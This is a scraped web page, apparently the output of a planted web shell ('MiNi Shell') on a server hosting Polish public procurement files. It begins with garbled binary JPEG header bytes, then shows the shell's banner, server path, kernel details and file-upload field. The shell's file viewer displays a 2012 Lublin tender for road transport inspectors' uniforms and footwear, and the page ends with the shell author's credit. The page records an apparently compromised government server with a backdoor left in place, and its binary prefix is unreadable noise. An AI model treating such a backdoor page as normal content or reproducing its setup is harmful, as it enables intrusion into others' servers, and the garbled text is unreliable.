JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120119/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120119/17968-N-2012.html

<p class="kh_header"><b>Lublin: Dostawa składników umundurowania dla inspektorów transportu drogowego Wojewódzkiego   Inspektoratu Transportu Drogowego w Lublinie w 2012 roku</b><br>
<b>Numer ogłoszenia: 17968 - 2012; data zamieszczenia: 19.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Inspektorat Transportu Drogowego w Lublinie , ul. Diamentowa 2, 20-447 Lublin, woj. lubelskie, tel. 81 7406971 do 73, faks 81 7406437.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.witd.lublin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa składników umundurowania dla inspektorów transportu drogowego Wojewódzkiego   Inspektoratu Transportu Drogowego w Lublinie w 2012 roku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.             Przedmiotem zamówienia jest dostawa składników umundurowania służbowego dla inspektorów transportu drogowego zatrudnionych w Wojewódzkim Inspektoracie  Transportu Drogowego  określonych  szczegółowo w części nr 1,  w części nr 2  i części nr 3 zamówienia.
2.	   Składniki umundurowania wymienione w części nr 1, nr 2 i nr 3 zamówienia , muszą być zgodne ze wzorami  i charakterystyką umundurowania  służbowego Inspekcji Transportu Drogowego oraz z dystynkcjami określonymi  w  Rozporządzeniu Ministra Infrastruktury w sprawie umundurowania Inspekcji Transportu Drogowego z dnia 15 maja 2009 r. (Dz. U. Nr 82, poz. 688) , zmienionego Rozporządzeniem Ministra Infrastruktury z dnia 16 czerwca 2010 r. zmieniającego rozporządzenie w sprawie umundurowania Inspekcji Transportu Drogowego( Dz. U. Nr 125, poz. 847) oraz Rozporządzeniem Ministra Infrastruktury z dnia 5 lipca 2011 roku zmieniającego rozporządzenie w sprawie umundurowania Inspekcji Transportu Drogowego.
3.	    Na guzikach zewnętrznych i czapkach wchodzących w skład umundurowania powinien być umieszczony wizerunek orła, zgodny z wzorem określonym w ustawie z dnia 31 stycznia 1980 r. o godle, barwach i hymnie Rzeczpospolitej Polskiej oraz o pieczęciach państwowych (t.j. Dz.U. z 2005 r. Nr 235, poz. 2000 z późn. zm.)
4.	   Szczegółową charakterystykę składników umundurowania, specyfikację techniczną i opis wykonania składników umundurowania  określa zarządzenie Głównego Inspektora Transportu Drogowego nr 22/2010 z dnia 26 sierpnia 2010 roku w sprawie Specyfikacji Technicznej Składników Umundurowania Służbowego Inspekcji Transportu Drogowego stanowiącego    załącznik nr 4 do SIWZ. 
5.	    Przedmiot zamówienia podzielony został na trzy  odrębne części:
6.	
 Część  nr 1
Dostawa sortów mundurowych dla inspektorów transportu drogowego wraz z dystynkcjami wyszczególnionymi  w tabeli nr 1. 
Tabela nr 1
 
Lp.              Nazwa sortu            Jedn.miary       Ilość
1.	Spodnie z tropiku	             para	48
2.	Spodnie z gabardyny	para	44
3.	Spódnica z tropiku	             szt.	1
4.	Spódnica z gabardyny	szt.	2
5.	Marynarka z tropiku	szt.	2
6.	Marynarka z gabardyny	szt.	3
7	Koszula z dł. rękawem	szt.	66
8	Koszula z kr. rękawem	szt.	66
9.	Sweter służbowy	             szt.	33
10.	Krawat typu wojskowego	szt.	60
11.	Czapka służb. z gabardynowaszt.	17
12.	Czapka służb. zimowa	szt.	16
13.	Pokrowiec na czapkę służb.	szt.	98
14.	Rękawiczki skórzane	szt.	18
15.	Kamizelka ostrzegawcza	szt.	50
16.	Szalik	                         szt.	26
17.	Pas główny	            szt.	32

Część  nr 2
Dostawa sortów mundurowych dla inspektorów transportu drogowego wraz z dystynkcjami i identyfikatorami imiennymi  wyszczególnionymi  w tabeli nr 2. 
Tabela nr 2
 	 	 	 		 	
Lp.	nazwa sortu                     jedn.miary            Ilość 	.	
	 		 	 	 	
1.	Bluza polowa	                    szt.  	    8
2.	Spodnie polowe	                    szt.	               70
3.	kurtka 3/4 ocieplana	       szt.                12
4.	Skarpety do obuwia polowego      para              179
5.	T-shirt	                                 para	 109
6.	czapka letnia z daszkiem	        szt.	   35
7.	pochewka z dystynkcją	       para	   16
8.	identyfikator imienny	        szt.	 144
9	Oznaka ITD	                     kpl.	    4

Część 3
Dostawa obuwia wchodzącego w skład składników umundurowania inspektorów transportu drogowego wyszczególnionych w tabeli nr 3.

Tabela nr 3 
Lp.	Wyszczególnienie	                              Jedn. miary	ilość
1	Półbuty skórzane męskie koloru czarnego	para	2
2	Buty polowe	                                       para	6


7.	   Zamawiający nie podaje rozmiarów sortów mundurowych, obuwia oraz dystynkcji  określonych w części nr 1, części nr 2 i części nr 3 przedmiotu zamówienia.  Dystynkcje i rozmiary obuwia będą  podane po podpisaniu umowy. Wymiary inspektorów potrzebne do określenia wymiarów sortów mundurowych Wykonawca pobierze osobiście po podpisaniu umowy w siedzibie Zamawiającego.
8.	   Poszczególne składniki umundurowania muszą posiadać wykonane napisy zgodnie z opisem przedmiotu zamówienia i posiadać przyszyte w odpowiednie miejsca guziki.
9.	    Kalkulacja cenowa sortów mundurowych musi zawierać cenę wizerunków orła  i    guzików. Kalkulacja cenowa na czapki musi zawierać cenę otoku ze stopniem służbowym.
10.	   Dostawa składników umundurowania inspektorów transportu drogowego zamawianych w części nr 1, nr 2, nr 3  odbywać się będzie na koszt Wykonawcy do siedziby Zamawiającego.
11.	W części nr 2 zamówienia dostawa identyfikatorów odbywać się będzie na podstawie imiennej listy przekazanej przez Zamawiającego. 
12.	 Wszystkie składniki umundurowania muszą być pierwszego gatunku, fabrycznie nowe i wolne od wad.
13.	Na wszystkie składniki umundurowania służbowego Wykonawca musi udzielić 12 miesięcznej gwarancji, z wyjątkiem obuwia polowego na które Wykonawca musi udzielić  24 miesięcznej  gwarancji.
14.	Zamawiający zastrzega sobie prawo ograniczenia zakresu przedmiotu zamówienia                               we wszystkich częściach zamówienia w odniesieniu do określonego w niniejszej SIWZ, a wynagrodzenie będzie płacone za zrealizowaną część zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 18.10.00.00-0, 18.80.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium na każdą część zamówienia.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku, o którym mowa w części IV.1 pkt 1 ppkt 2 SIWZ Zamawiający uzna wykazanie, iż Wykonawca w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - to w tym okresie, wykonał co najmniej 3 dostawy  na składniki umundurowania na kwotę nie mniejszą niż 46.000,00 złotych w zakresie części nr 1 zamówienia,  32.000,00 złotych w zakresie części nr 2 zamówienia,  natomiast w zakresie części nr 3 wykonał co najmniej 3 dostawy obuwia takiego lub podobnego opisanego w części nr 3  SIWZ na kwotę 4.000,00 złotych.
Spełnienie tego warunku Zamawiający będzie oceniał na podstawie dokumentów i oświadczeń, o których mowa w części V.1 pkt 4 SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. W przypadku, gdy Wykonawcę reprezentuje pełnomocnik - pełnomocnictwo 
do podpisania oferty, określające jego zakres i podpisane przez osoby upoważnione 
do reprezentowania Wykonawcy wraz z dokumentem, z którego wynika sposób reprezentacji Wykonawcy (np. odpis z właściwego rejestru).
2. W przypadku, gdy ofertę składają Wykonawcy występujący wspólnie wymagane jest załączenie dokumentu pełnomocnictwa określającego zakres umocowania pełnomocnika ustanowionego do reprezentowania ich w postępowaniu, stosownie 
do art. 23 ust. 2 ustawy Prawo zamówień publicznych, podpisane przez osoby upoważnione do składania oświadczeń woli, każdego z Wykonawców wspólnie ubiegających się o udzielenie zamówienia wraz z dokumentami, z których wynika sposób reprezentacji Wykonawców.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.witd.lublin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Inspektorat Transportu Drogowego w Lublinie,  ul. Diamentowa 2,    20-447 Lublin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.01.2012 godzina 10:00, miejsce: Wojewódzki Inspektorat Transportu Drogowego w Lublinie,  ul. Diamentowa 2,    20-447 Lublin,  sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa sortów mundurowych dla inspektorów transportu drogowego wraz z dystynkcjami wyszczególnionymi  w tabeli nr 1..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Tabela nr 1
 
Lp.   Nazwa sortu                           Jedn.miary         Ilość
1.	Spodnie z tropiku	                    para	48
2.	Spodnie z gabardyny	       para	44
3.	Spódnica z tropiku	                     szt.	1
4.	Spódnica z gabardyny	        szt.	2
5.	Marynarka z tropiku	        szt.	2
6.	Marynarka z gabardyny                szt.	3
7	Koszula z dł. rękawem	        szt.	66
8	Koszula z kr. rękawem	        szt.	66
9.	Sweter służbowy                        szt.	33
10.	Krawat typu wojskowego	        szt.	60
11.	Czapka służb. z gabardynowa       szt.	             17
12.	Czapka służb. zimowa	        szt.	16
13.	Pokrowiec na czapkę służb.          szt.	98
14.	Rękawiczki skórzane	        szt.	18
15.	Kamizelka ostrzegawcza	        szt.	50
16.	Szalik	                                  szt.	26
17.	Pas główny	                     szt.	32.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.81.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa sortów mundurowych dla inspektorów transportu drogowego wraz z dystynkcjami i identyfikatorami imiennymi  wyszczególnionymi  w tabeli nr 2..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Tabela nr 2
Lp.	Nazwa sortu 	            Jedn.miary	Ilość 	 	
1.	Bluza polowa	                     szt.	8
2.	Spodnie polowe	                     szt.	70
3.	kurtka 3/4 ocieplana	        szt.	12
4.	Skarpety do obuwia polowego      para	179
5.	T-shirt	                                 para	109
6.	czapka letnia z daszkiem              szt.	35
7.	pochewka z dystynkcją	       para	16
8.	identyfikator imienny	        szt.	144
9	Oznaka ITD	                     kpl.	4.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.10.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa obuwia wchodzącego w skład składników umundurowania inspektorów transportu drogowego wyszczególnionych w tabeli nr 3..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Tabela nr 3 
Lp.	Wyszczególnienie	                              Jedn. miary	ilość
1	Półbuty skórzane męskie koloru czarnego	para	2
2	Buty polowe	                                       para	6.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.80.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com